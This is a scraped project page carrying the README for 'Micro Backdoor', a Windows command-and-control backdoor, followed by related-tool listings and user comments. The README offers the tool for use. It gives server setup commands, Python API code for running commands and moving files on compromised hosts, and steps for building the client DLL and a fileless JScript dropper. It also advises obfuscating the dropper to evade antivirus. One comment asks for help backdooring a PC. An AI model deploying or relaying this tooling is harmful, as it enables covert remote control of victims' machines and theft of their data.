Small and convenient C2 tool for Windows targets

Micro Backdoor for Windows

Micro Backdoor is C2 tool for Windows targets with easy customizable code base and small footprint. Micro Backdoor consists from server, client and dropper. It wasn't designed as replacement for your favorite post-exploitation tools but rather as really minimalistic thing with all of the basic features in less than 5000 lines of code, client DLL size is less than 20Kb without compression.

I'm using Micro Backdoor mostly for demonstration purposes as payload for my firmware rootkits and various low level persistence techniques. Its code was written in couple of nights, so, it might contain bugs and vulnerabilities: use it only for your own risk.

General information
Web interface screenshots
Configuring the server
Using Python API
Deploying the server
Building Docker container
Configuring the client

General information

Micro Backdoor client supports 32-bit and 64-bit versions of Windows XP, Vista, 7, 8, 8.1, 10, Server 2003, Server 2003 R2, Server 2008, Server 2008 R2, Server 2012, Server 2012 R2, Server 2016 and Server 2019 of any editions, languages and service packs.

Key features of the Micro Backdoor:

  • Client dropper is written in Microsoft JScript which makes it extremely convenient for obfuscation: once AV starts to detect the dropper you easily can modify its code or apply existing JScript obfuscation tools.

  • Client can detect SOCKS 4, SOCKS 5 or HTTP proxy server configuration in the system settings and connect to the server over this proxy.

  • In order to communicate with the server Micro Backdoor client is using end-to-end encrypted protocol with RSA authentication and random session key.

  • Client dropper is not creating any executable files on the disk: its body is stored inside Windows registry values which reduces backdoor footprint and makes it more stealth.

  • Backdoor server is written in Python and can be used on any operating system. It provides clean and simple web interface which allows to interact with connected clients in convenient way. Redis database is used to store clients state.

  • Backdoor server keeps track of all events for clients and server in the log files.

  • For each connected client Micro Backdoor provides semi-interactive command shell running in the web browser.

  • Micro Backdoor has convenient file manager which allows to browse client file system, download and upload the files.

  • Full Unicode and native languages support by both client and server.

  • Backdoor server is also providing Python API and command line interface to perform any actions with connected clients which is useful for automation and scripting.

Web interface screenshots

Main web interface page with connected clients list:

Command shell page:

File manager page:

Configuring the server

Micro Backdoor server code is located in ./server directory, you have to upload its contents to the remote machine where you planning to run the server.

Directory contents:

  • server.py − Server executable file
  • config.py − Server configuration file
  • access.log − Access log of embedded web server used for admin interface
  • server.log − Server log file with messages related to connected clients
  • server.crt − Server RSA certificate used to encrypt client communication
  • server.key − Server RSA private key, see above
  • downloads/ − Directory to store files downloaded from the clients
  • logs/ − Directory with individual command line history files for each client
  • static/ − Directory with static files needed for admin interface

Python program server.py has a lot of command line options used to configure and manage the server, interact with connected clients, etc. Here’s how to get to get the server running:

  1. Install needed dependencies:
$ sudo apt-get install build-essential swig libssl-dev python python-dev python-setuptools python-pip
$ sudo pip install m2crypto pycrypto redis cherrypy defusedxml
  1. Install and run Redis database server:
$ sudo apt-get install redis-server
$ sudo service redis-server start
  1. Edit config.py file and change default values of HTTP_USERS and HTTP_PATH to secure your server installation.

  2. Generate RSA key pair for new installation of the server, it will create server.crt and server.key files:

$ ./server.py --keys
  1. Run the server as background process:
$ ./server.py --daemon
  1. Shutdown the server:
$ ./server.py --shutdown

Alternatively, you can run server.py with no command line options specified to start the server as interactive shell process (useful for debugging). After the server was started you can open admin interface in the web browser, its URL is composed from HTTP_ADDR, HTTP_PORT and HTTP_PATH options of config.py configuration file.

Also, there’s some options to interact with connected clients from the command line.

Retrieve and print list of the currently connected clients:

$ ./server.py --list

Execute some command on the connected client:

$ ./server.py --client <client_ID> --exec <command>

Upload some file to the connected client:

$ ./server.py --client <client_ID> --fput <remote_path> --file <local_path>

Download some file from the connected client:

$ ./server.py --client <client_ID> --fget <remote_path> --file <local_path>

Update Micro Backdoor on the client:

$ ./server.py --client <client_ID> --update <dropper_path>

Using Python API

As it was mentioned above, Micro Backdoor server is also providing Python API to interact with connected clients which is quite useful for automation and scripting purposes. Here's some examples how to use this API.

Obtain and print connected clients list:

from server import ClientHelper

# get clients list
clients = ClientHelper().client_list()

for client in clients:

    # print client information
    print('ID = %s, addr = %s' % (client.client_id, client.addr[0]))

Execute console command on the client:

# create client helper instance
client = ClientHelper(client_id)

# connect to the corresponding child process of the server
client.mapper_connect()

# execute console command
output, exit_code = client.execute('whoami')

# execute console command and redirect its output into the stream
client.execute('whoami', stream = sys.stdout)

Work with the file system of the client:

# create client helper instance
client = ClientHelper(client_id)

# connect to the corresponding child process of the server
client.mapper_connect()

# download file from the client
client.file_get('C:\\Windows\\win.ini', 'win.ini')

# upload file to the client
client.file_put('C:\\Users\\Test\\example.txt', 'example.txt')

# enumerate files in some directory
for size, name in client.file_list('C:\\Windows'):

    if size is None:

        # print directory name
        print(' DIR: %s' % name)

    else

        # print file name and size
        print('FILE: %s [%d bytes]' % (name, size))

Execute WMI queries on the client:

# create client helper instance
client = ClientHelper(client_id)

# connect to the corresponding child process of the server
client.mapper_connect()

# get CIM_OperatingSystem WMI class
for name, value in client.execute_wmi('os').items():

    # print class member name and value
    print('%s = %s' % (name, value))

# get only "Caption" class member value
os_name = client.execute_wmi('os', props = 'Caption')

Deploying the server

For easy deployment of Micro Backdoor server there's Fabric scenario located in fabfile.py Python script. To deploy the server to the remote Linux host you have to perform the following steps.

  1. Edit .ssh_config file located in the project directory and add your server information there, for example:
Host my-server
     HostName my-server.net
     Port 22
     User user
     IdentityFile ~/.ssh/id_rsa
  1. Run ./server.py --keys on your local machine to generate RSA key pair for secure communication between Micro Backdoor client and server.

  2. Run fab deps:host=my-server command to connect to the remote host my-server over the SSH and install needed dependencies.

  3. Run fab deploy:host=my-server command to copy needed files to the remote host my-server and run the server.

  4. You also can run fab stop to stop running server, fab start to start it and fab uninstall to shutdown and remove its files form the remote host.

Building Docker container

You also can run Micro Backdoor server inside Docker container with SSH and Redis servers included. To install docker on Ubuntu just run sudo apt-get install docker.io, for others distributives and operating systems please refer to official documentation.

Before building the container you need to run ./server.py --keys on your local machine to generate RSA key pair for secure communication between Micro Backdoor client and server. Then you have to cd into the docker directory and run make to build docker image and start the container. To stop running container you can press Ctrl+C and use make start/make stop commands to run it in the background, make rm to remove container and make rmi to remove image. To ssh into the running container run make shell and enter the password specified in docker/makefile.conf file ("acab" without quotes by default).

NOTE: Before building docker container please ensure that exposed TCP ports specified in docker/makefile.conf are the same as CLIENT_PORT and HTTP_PORT port numbers specified in config.py of the server.

Configuring the client

Micro Backdoor client consists from the binary part used to implement backdoor functionality and JScript wrapper combined with the shellcode used to run and deliver the binary part in file-less way.

⚠️ JScript and PowerShell code used in client dropper is easily detectable by most of AV/EDR products, you should consider to modify it or use other methods to deliver the binary part of the client

First, you have to configure the binary using ./client_builder.py command line program, it operates with default configuration specified in ./server/config.py file mentioned in previous part of the document.

Install Python pefile library:

$ pip install pefile

Configure the client binary:

$ ./client_builder.py client.dll [server_IP]

Also, you can specify client_amd64.dll file to use x86_64 version of the client, or client_debug.dll/client_amd64_debug.dll to use debug build of the client that prints diagnostic messages into the standard Windows debug output. Before running client_builder.py you need to generate RSA key pair, see Configuring the server section of this document.

You can use configured client binary with your own delivery tool: exploit, reflective loader, etc. Or you can generate JScript client dropper:

$ ./client_encoder.py dll_inject_script client.dll > dropper.js

Please note, that JScript/PowerShell reflective loader generated by client_encoder.py is working only with 32-bit versions of the client binary on both 32-bit and 64-bit Windows targets. 64-bit client binaries are provided only for convenience in case if you need to use them with your own loaders and tools.

After the dropper.js was generated you can deploy it on your targets. In Windows command line you can run JScript files by running cscript.exe dropper.js. Or you can just double click JS file in Windows Explorer to run the dropper. Micro Backdoor client provides persistence within current user account used to run the dropper, it can work with any privileges and medium integrity level.

Developed by

Dmytro Oleksiuk (aka Cr4sh)

[email protected]
http://blog.cr4.sh
@d_olex

Similar Resources

A small proof-of-concept for using disk devices for DMA on Windows.

A small proof-of-concept for using disk devices for DMA on Windows.

ddma A small proof-of-concept for using disk devices for DMA on Windows. Why Some native hypervisors (i.e. Hyper-V) allow the guest unvirtualized devi

Oct 27, 2022

A small DLL that fixes tool's usage of the Halo 3 shader compiler.

h3-shader-compiler-fix A small DLL that fixes tool's usage of the Halo 3 shader compiler. Tool forgot to initialise the compiler before using it, so t

Jun 20, 2022

A small, fast codeforces command line tool for competitive programming.

A small, fast codeforces command line tool for competitive programming.

chainsaw: A Codeforces Commandline Tool chainsaw is a small and faster drop-in replacement for your copy and paste while attending Codeforces contests

Nov 9, 2022

Windows 10 interface adjustment tool supports automatic switching of light and dark modes, automatic switching of themes and transparent setting of taskbar

  Windows 10 interface adjustment tool supports automatic switching of light and dark modes, automatic switching of themes and transparent setting of taskbar

win10_tools Windows 10 interface adjustment tool supports automatic switching of light and dark modes, automatic switching of themes and transparent s

Dec 3, 2021

6D - Pose Annotation Tool (6D-PAT) - is a tool that allows the user to load a set of images and also a set of 3D models and annotate where in the 2D image the 3D object ist placed.

6D - Pose Annotation Tool (6D-PAT) - is a tool that allows the user to load a set of images and also a set of 3D models and annotate where in the 2D image the 3D object ist placed.

6D - Pose Annotation Tool (6D-PAT) For detiled explanations checkout the WikiPage. What is it? With 6D-PAT you can create 6D annotations on images for

Nov 20, 2022

mimikatz is a tool I've made to learn C and make somes experiments with Windows security

mimikatz is a tool I've made to learn C and make somes experiments with Windows security

Nov 29, 2022

Serial Data Monitor is a multiplatform (Windows, Linux, Mac, ...) tool to interactively receive/edit/monitor data and send commands to an embedded system via the serial bus

Serial Data Monitor is a multiplatform (Windows, Linux, Mac, ...) tool to interactively receive/edit/monitor data and send commands to an embedded system via the serial bus

See wiki for full documentation Serial Data Monitor Description Serial Data Monitor is a multiplatform (Windows, Linux, Mac, ...) tool to interactivel

Oct 29, 2021

PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.

PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.

PetitPotam PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions :) The tools use the

Nov 23, 2022

Azure Outlook Command & Control (C2) - Remotely control a compromised Windows Device from your Outlook mailbox. Threat Emulation Tool for North Korean APT InkySquid / ScarCruft / APT37. TTP: Use Microsoft Graph API for C2 Operations.

Azure Outlook Command & Control (C2) - Remotely control a compromised Windows Device from your Outlook mailbox. Threat Emulation Tool for North Korean APT InkySquid / ScarCruft / APT37. TTP: Use Microsoft Graph API for C2 Operations.

Azure Outlook C2 Azure Outlook Command & Control that uses Microsoft Graph API for C2 communications & data exfiltration. Remotely Control a compromis

Nov 29, 2022
Comments
  • AttributeError: 'module' object has no attribute 'SERVER_ADDR'

    AttributeError: 'module' object has no attribute 'SERVER_ADDR'

    hello everyone, I found a problem in the file client_builder.py it says in the Conf module there is no SERVER_ADDR attribut. But checking in the config.py file there is the variable SERVER_ADDR, I tried to search the internet for the solution but I didn't find anything, I hope you could tell me the solution to this problem.

    ERROR: python2 client_builder.py client.dll 127.0.0.1 Traceback (most recent call last): File "client_builder.py", line 108, in <module> exit(main()) File "client_builder.py", line 85, in main addr = Conf.SERVER_ADDR AttributeError: 'module' object has no attribute 'SERVER_ADDR'

  • What part of the config.py file needs to be modified?

    What part of the config.py file needs to be modified?

    Say the address of the server is 123.45.67.89, what parts of the config.py need to list that IP address. I'm running the client builder and its creating my client.dll but when I go to run the dll on the PC I want a backdoor on, nothing is connecting. I'm not sure what I need to modify in order to get this to work. What is the Server Process IPC for, and the Child Server Process IPC, or the Redis BD host/port?

Memory Process File System (MemProcFS) is an easy and convenient way of viewing physical memory as files in a virtual file system
Memory Process File System (MemProcFS) is an easy and convenient way of viewing physical memory as files in a virtual file system

The Memory Process File System (MemProcFS) is an easy and convenient way of viewing physical memory as files in a virtual file system.

Dec 2, 2022
Just a repository convenient for reviewing and retrieval practice.

The-art-of-multiprocessor-programming Purpose Just a repository convenient for reviewing and retrieval practice. The architecture of this repository(H

Nov 9, 2021
Convenient, high-performance RGB color and position control for console output
Convenient, high-performance RGB color and position control for console output

Oof (omnipotent output friend) It's common for C++ programs to write output to the console. But consoles are far more capable than what they are usual

Nov 26, 2022
xsnip - a minimal and convenient screenshot utility for X11

xsnip - a minimal and convenient screenshot utility for X11 Most screenshot utilities compatible with X are clumsy, use bloated toolkits, and often do

Sep 8, 2022
Convenient generic print() for C
Convenient generic print() for C

generic-print Convenient generic print() for C inspired by Python/JavaScript and other high-level languages. Still using printf("%i\n", result) for de

Nov 19, 2022
Random for modern C++ with convenient API

Random for modern C++ with convenient API Design goals Supported compilers Integration Five-minute tutorial Number range Common type number range Char

Nov 26, 2022
DirectX 11 library that provides convenient access to compute-based triangle filtering (CTF)

AMD GeometryFX The GeometryFX library provides convenient access to compute-based triangle filtering (CTF), which improves triangle throughput by filt

Oct 6, 2022
Implements a Windows service (in a DLL) that removes the rounded corners for windows in Windows 11

ep_dwm Implements a Windows service that removes the rounded corners for windows in Windows 11. Tested on Windows 11 build 22000.434. Pre-compiled bin

Nov 22, 2022
C++11 header-only library that offers small vector, small flat map/set/multimap/multiset.

sfl library This is header-only C++11 library that offers several new containers: small_vector small_flat_set small_flat_map small_flat_multiset small

Nov 15, 2022
An efficient, small mobile key-value storage framework developed by WeChat. Works on Android, iOS, macOS, Windows, and POSIX.
An efficient, small mobile key-value storage framework developed by WeChat. Works on Android, iOS, macOS, Windows, and POSIX.

中文版本请参看这里 MMKV is an efficient, small, easy-to-use mobile key-value storage framework used in the WeChat application. It's currently available on Andr

Nov 25, 2022